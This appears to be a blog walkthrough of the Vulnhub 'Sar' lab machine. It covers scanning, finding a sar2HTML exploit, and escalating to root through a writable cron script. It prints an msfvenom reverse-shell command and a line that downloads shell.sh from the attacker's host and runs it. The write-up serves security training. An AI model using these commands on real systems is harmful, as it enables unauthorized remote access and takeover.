Vulnhub – Sar Walkthrough

Scanning the target with nmap –A –T4 –p- 192.168.1.8 –vv

The dirb scan gave us a robot.txt file where we found a sar2HTML path:

I’ve searched Searchsploit for Sar2HTML and I got a result:

As we can see following the exploit explanation:

We can also view /etc/passwd file and see the users on the target machine:

Now let’s create a shell and upload it to the target, we need to start a listening port and SimpleHTTPServer:

msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.1.11 LPORT=1234 > shell.sh

cd /tmp; wget http://192.168.1.11:80/shell.sh; chmod 777 shell.sh; ./shell.sh

In my case it’s uploaded but didn’t run so I went back and I ran it bash /tmp/shell.sh

Now we have 2 files one is write.sh and the other is finally.sh:

Now let’s upload a shell and run it with the help of write.sh, we upload the file php-reverse-shell.php and rename it to anything you want (exploit.php) and echo it inside the file write.sh:

Few moment and we got a root shell back at the listener we are running:

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s